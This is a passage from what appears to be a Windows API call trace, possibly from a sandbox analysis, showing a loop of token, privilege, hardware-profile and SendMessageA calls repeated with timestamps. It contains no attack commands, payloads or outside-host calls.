pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.677] GetLastError () returned 0x578 [0084.677] SetLastError (dwErrCode=0x578) [0084.677] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.677] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.677] GetCurrentThread () returned 0xfffffffe [0084.677] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.677] GetLastError () returned 0x3f0 [0084.677] GetCurrentProcess () returned 0xffffffff [0084.677] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.678] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.678] SetLastError (dwErrCode=0x522) [0084.678] CloseHandle (hObject=0x114) returned 1 [0084.678] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.678] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.678] GetLastError () returned 0x578 [0084.678] SetLastError (dwErrCode=0x578) [0084.678] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.678] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.678] GetCurrentThread () returned 0xfffffffe [0084.678] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.678] GetLastError () returned 0x3f0 [0084.678] GetCurrentProcess () returned 0xffffffff [0084.678] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.678] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.678] SetLastError (dwErrCode=0x522) [0084.678] CloseHandle (hObject=0x114) returned 1 [0084.678] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.678] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.678] GetLastError () returned 0x578 [0084.678] SetLastError (dwErrCode=0x578) [0084.678] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.678] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.678] GetCurrentThread () returned 0xfffffffe [0084.678] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.678] GetLastError () returned 0x3f0 [0084.678] GetCurrentProcess () returned 0xffffffff [0084.678] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.678] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.678] SetLastError (dwErrCode=0x522) [0084.678] CloseHandle (hObject=0x114) returned 1 [0084.678] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.678] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.678] GetLastError () returned 0x578 [0084.678] SetLastError (dwErrCode=0x578) [0084.678] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.678] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.678] GetCurrentThread () returned 0xfffffffe [0084.678] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.678] GetLastError () returned 0x3f0 [0084.678] GetCurrentProcess () returned 0xffffffff [0084.678] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.679] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.679] SetLastError (dwErrCode=0x522) [0084.679] CloseHandle (hObject=0x114) returned 1 [0084.679] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.679] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.679] GetLastError () returned 0x578 [0084.679] SetLastError (dwErrCode=0x578) [0084.679] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.679] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.679] GetCurrentThread () returned 0xfffffffe [0084.679] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.679] GetLastError () returned 0x3f0 [0084.679] GetCurrentProcess () returned 0xffffffff [0084.679] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.679] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.679] SetLastError (dwErrCode=0x522) [0084.679] CloseHandle (hObject=0x114) returned 1 [0084.679] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.679] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.679] GetLastError () returned 0x578 [0084.679] SetLastError (dwErrCode=0x578) [0084.679] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.679] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.679] GetCurrentThread () returned 0xfffffffe [0084.679] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.679] GetLastError () returned 0x3f0 [0084.679] GetCurrentProcess () returned 0xffffffff [0084.679] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.679] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.679] SetLastError (dwErrCode=0x522) [0084.679] CloseHandle (hObject=0x114) returned 1 [0084.679] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.679] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.679] GetLastError () returned 0x578 [0084.679] SetLastError (dwErrCode=0x578) [0084.679] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.679] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.679] GetCurrentThread () returned 0xfffffffe [0084.679] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.679] GetLastError () returned 0x3f0 [0084.679] GetCurrentProcess () returned 0xffffffff [0084.679] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.680] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.680] SetLastError (dwErrCode=0x522) [0084.680] CloseHandle (hObject=0x114) returned 1 [0084.680] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.680] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.680] GetLastError () returned 0x578 [0084.680] SetLastError (dwErrCode=0x578) [0084.680] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.680] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.680] GetCurrentThread () returned 0xfffffffe [0084.680] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.680] GetLastError () returned 0x3f0 [0084.680] GetCurrentProcess () returned 0xffffffff [0084.680] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.680] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.680] SetLastError (dwErrCode=0x522) [0084.680] CloseHandle (hObject=0x114) returned 1 [0084.680] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.680] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.680] GetLastError () returned 0x578 [0084.680] SetLastError (dwErrCode=0x578) [0084.680] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.680] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.680] GetCurrentThread () returned 0xfffffffe [0084.680] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.680] GetLastError () returned 0x3f0 [0084.680] GetCurrentProcess () returned 0xffffffff [0084.680] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.680] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.680] SetLastError (dwErrCode=0x522) [0084.680] CloseHandle (hObject=0x114) returned 1 [0084.680] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.680] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.680] GetLastError () returned 0x578 [0084.680] SetLastError (dwErrCode=0x578) [0084.680] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.680] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.680] GetCurrentThread () returned 0xfffffffe [0084.680] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.680] GetLastError () returned 0x3f0 [0084.680] GetCurrentProcess () returned 0xffffffff [0084.681] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.681] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.681] SetLastError (dwErrCode=0x522) [0084.681] CloseHandle (hObject=0x114) returned 1 [0084.681] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.681] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.681] GetLastError () returned 0x578 [0084.681] SetLastError (dwErrCode=0x578) [0084.681] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.681] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.681] GetCurrentThread () returned 0xfffffffe [0084.681] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.681] GetLastError () returned 0x3f0 [0084.681] GetCurrentProcess () returned 0xffffffff [0084.681] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.681] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.681] SetLastError (dwErrCode=0x522) [0084.681] CloseHandle (hObject=0x114) returned 1 [0084.681] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.681] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.681] GetLastError () returned 0x578 [0084.681] SetLastError (dwErrCode=0x578) [0084.681] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.681] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.681] GetCurrentThread () returned 0xfffffffe [0084.681] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.681] GetLastError () returned 0x3f0 [0084.681] GetCurrentProcess () returned 0xffffffff [0084.681] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.681] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.681] SetLastError (dwErrCode=0x522) [0084.681] CloseHandle (hObject=0x114) returned 1 [0084.681] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.681] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.681] GetLastError () returned 0x578 [0084.681] SetLastError (dwErrCode=0x578) [0084.681] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.681] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.681] GetCurrentThread () returned 0xfffffffe [0084.681] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.681] GetLastError () returned 0x3f0 [0084.681] GetCurrentProcess () returned 0xffffffff [0084.682] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.682] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.682] SetLastError (dwErrCode=0x522) [0084.682] CloseHandle (hObject=0x114) returned 1 [0084.682] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.682] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.682] GetLastError () returned 0x578 [0084.682] SetLastError (dwErrCode=0x578) [0084.682] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.682] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.682] GetCurrentThread () returned 0xfffffffe [0084.682] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.682] GetLastError () returned 0x3f0 [0084.682] GetCurrentProcess () returned 0xffffffff [0084.682] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.682] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.682] SetLastError (dwErrCode=0x522) [0084.682] CloseHandle (hObject=0x114) returned 1 [0084.682] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.682] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.682] GetLastError () returned 0x578 [0084.682] SetLastError (dwErrCode=0x578) [0084.682] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.682] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.682] GetCurrentThread () returned 0xfffffffe [0084.682] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.682] GetLastError () returned 0x3f0 [0084.682] GetCurrentProcess () returned 0xffffffff [0084.682] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.682] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.682] SetLastError (dwErrCode=0x522) [0084.682] CloseHandle (hObject=0x114) returned 1 [0084.682] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.682] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.682] GetLastError () returned 0x578 [0084.682] SetLastError (dwErrCode=0x578) [0084.682] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.682] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.682] GetCurrentThread () returned 0xfffffffe [0084.682] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.682] GetLastError () returned 0x3f0 [0084.682] GetCurrentProcess () returned 0xffffffff [0084.683] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.683] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.683] SetLastError (dwErrCode=0x522) [0084.683] CloseHandle (hObject=0x114) returned 1 [0084.683] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.683] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.683] GetLastError () returned 0x578 [0084.683] SetLastError (dwErrCode=0x578) [0084.683] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.683] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.683] GetCurrentThread () returned 0xfffffffe [0084.683] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.683] GetLastError () returned 0x3f0 [0084.683] GetCurrentProcess () returned 0xffffffff [0084.683] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.683] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.683] SetLastError (dwErrCode=0x522) [0084.683] CloseHandle (hObject=0x114) returned 1 [0084.683] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.683] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.683] GetLastError () returned 0x578 [0084.683] SetLastError (dwErrCode=0x578) [0084.683] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.683] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.683] GetCurrentThread () returned 0xfffffffe [0084.683] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.683] GetLastError () returned 0x3f0 [0084.683] GetCurrentProcess () returned 0xffffffff [0084.683] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.683] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.683] SetLastError (dwErrCode=0x522) [0084.683] CloseHandle (hObject=0x114) returned 1 [0084.683] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.683] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.683] GetLastError () returned 0x578 [0084.683] SetLastError (dwErrCode=0x578) [0084.683] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.683] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.683] GetCurrentThread () returned 0xfffffffe [0084.683] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.683] GetLastError () returned 0x3f0 [0084.684] GetCurrentProcess () returned 0xffffffff [0084.684] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.684] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.684] SetLastError (dwErrCode=0x522) [0084.684] CloseHandle (hObject=0x114) returned 1 [0084.684] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.684] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.684] GetLastError () returned 0x578 [0084.684] SetLastError (dwErrCode=0x578) [0084.684] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.684] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.684] GetCurrentThread () returned 0xfffffffe [0084.684] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.684] GetLastError () returned 0x3f0 [0084.684] GetCurrentProcess () returned 0xffffffff [0084.684] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.684] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.684] SetLastError (dwErrCode=0x522) [0084.684] CloseHandle (hObject=0x114) returned 1 [0084.684] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.684] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.684] GetLastError () returned 0x578 [0084.684] SetLastError (dwErrCode=0x578) [0084.684] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.684] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.684] GetCurrentThread () returned 0xfffffffe [0084.684] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.684] GetLastError () returned 0x3f0 [0084.684] GetCurrentProcess () returned 0xffffffff [0084.684] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.684] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.684] SetLastError (dwErrCode=0x522) [0084.684] CloseHandle (hObject=0x114) returned 1 [0084.684] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.684] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.684] GetLastError () returned 0x578 [0084.684] SetLastError (dwErrCode=0x578) [0084.684] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: 